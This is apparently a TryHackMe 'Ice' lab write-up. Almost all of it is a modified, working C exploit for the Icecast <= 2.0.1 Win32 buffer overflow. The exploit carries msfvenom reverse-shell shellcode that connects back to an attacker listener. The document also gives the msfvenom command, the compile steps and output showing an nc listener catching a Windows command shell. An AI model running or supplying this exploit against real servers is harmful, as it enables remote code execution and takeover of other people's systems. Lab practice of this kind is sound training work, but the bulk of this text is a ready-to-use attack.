Ice Task 7 (H)
Manual Exploiting Windows & Privilege Escalation
Task 7: Explore manual exploitation via exploit code found on exploit-db. Exploit link: https://www.exploit-db.com/exploits/568
The original code did not work, here's the modified version:
1) Before running msfvenom to create the reverse shell, modify the LHOST, afterwards, replace the array with your own shellcode.
/*
Original exploit here: https://www.exploit-db.com/exploits/568
I couldn't get this to work so I edited it according to
https://www.exploit-db.com/exploits/573
and made sure the shellcode was executed.
Compile and run
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi@altervista.org
web:http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 192.168.92.133:8000
- send malformed data
Server IS vulnerable!!!
On listener
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ 2048
#define TIMEOUT 3
#define EXEC "GET / HTTP/1.0\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"\xcc"
// msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.98.179 LPORT=443 -b '\x0a\x0d\x00' -f c
unsigned char shellcode[] =
"\xb8\x78\xe5\xde\x0b\xda\xd3\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x52\x31\x43\x12\x83\xeb\xfc\x03\x3b\xeb\x3c\xfe\x47\x1b\x42"
"\x01\xb7\xdc\x23\x8b\x52\xed\x63\xef\x17\x5e\x54\x7b\x75\x53"
"\x1f\x29\x6d\xe0\x6d\xe6\x82\x41\xdb\xd0\xad\x52\x70\x20\xac"
"\xd0\x8b\x75\x0e\xe8\x43\x88\x4f\x2d\xb9\x61\x1d\xe6\xb5\xd4"
"\xb1\x83\x80\xe4\x3a\xdf\x05\x6d\xdf\xa8\x24\x5c\x4e\xa2\x7e"
"\x7e\x71\x67\x0b\x37\x69\x64\x36\x81\x02\x5e\xcc\x10\xc2\xae"
"\x2d\xbe\x2b\x1f\xdc\xbe\x6c\x98\x3f\xb5\x84\xda\xc2\xce\x53"
"\xa0\x18\x5a\x47\x02\xea\xfc\xa3\xb2\x3f\x9a\x20\xb8\xf4\xe8"
"\x6e\xdd\x0b\x3c\x05\xd9\x80\xc3\xc9\x6b\xd2\xe7\xcd\x30\x80"
"\x86\x54\x9d\x67\xb6\x86\x7e\xd7\x12\xcd\x93\x0c\x2f\x8c\xfb"
"\xe1\x02\x2e\xfc\x6d\x14\x5d\xce\x32\x8e\xc9\x62\xba\x08\x0e"
"\x84\x91\xed\x80\x7b\x1a\x0e\x89\xbf\x4e\x5e\xa1\x16\xef\x35"
"\x31\x96\x3a\x99\x61\x38\x95\x5a\xd1\xf8\x45\x33\x3b\xf7\xba"
"\x23\x44\xdd\xd2\xce\xbf\xb6\xd6\x04\xdd\xf5\x8f\x1a\x21\xfb"
"\xf4\x92\xc7\x91\x1a\xf3\x50\x0e\x82\x5e\x2a\xaf\x4b\x75\x57"
"\xef\xc0\x7a\xa8\xbe\x20\xf6\xba\x57\xc1\x4d\xe0\xfe\xde\x7b"
"\x8c\x9d\x4d\xe0\x4c\xeb\x6d\xbf\x1b\xbc\x40\xb6\xc9\x50\xfa"
"\x60\xef\xa8\x9a\x4b\xab\x76\x5f\x55\x32\xfa\xdb\x71\x24\xc2"
"\xe4\x3d\x10\x9a\xb2\xeb\xce\x5c\x6d\x5a\xb8\x36\xc2\x34\x2c"
"\xce\x28\x87\x2a\xcf\x64\x71\xd2\x7e\xd1\xc4\xed\x4f\xb5\xc0"
"\x96\xad\x25\x2e\x4d\x76\x55\x65\xcf\xdf\xfe\x20\x9a\x5d\x63"
"\xd3\x71\xa1\x9a\x50\x73\x5a\x59\x48\xf6\x5f\x25\xce\xeb\x2d"
"\x36\xbb\x0b\x81\x37\xee";
/*
in my example 0xcc is used to interrupt the code execution, you must
put your shellcode exactly there.
You don't need to call a shellcode offset (CALL ESP, JMP ESP and so
on) or doing any other annoying operation because the code flow
points directly there!!!
Cool and easy 8-)
*/
/*int startWinsock(void)
{
WSADATA wsa;
return WSAStartup(MAKEWORD(2,0),&wsa);
}
*/
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
u_char buff[BUFFSZ];
u_char buf[4096];
u_char *pointer=NULL;
setbuf(stdout, NULL);
fputs("\n"
"Icecast <= 2.0.1 Win32 remote code execution "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web:http://aluigi.altervista.org\n"
"\nshellcode add-on by Delikon\n"
"www.delikon.de"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n"
"Note: This exploit will force the Icecast server to download NCAT\n"
"and after execution it will spwan a shell on 9999\n"
"\n", argv[0], PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port= htons(port);
peer.sin_family= AF_INET;
memset(buf,0x00,sizeof(buf));
strcpy(buf,EXEC);
pointer =strrchr(buf,0xcc);
strcpy(pointer,shellcode);
strcat(buf,"\r\n");
strcat(buf,"\r\n");
printf("\n- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
fputs("- send malformed data\n", stdout);
if(send(sd, buf, strlen(buf), 0)
< 0) std_err();
if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
exit(1);
}
#endif
// milw0rm.com [2004-10-06]
2) Compile it with the command:
gcc exploit.c -o exploit-compiled
Last updated
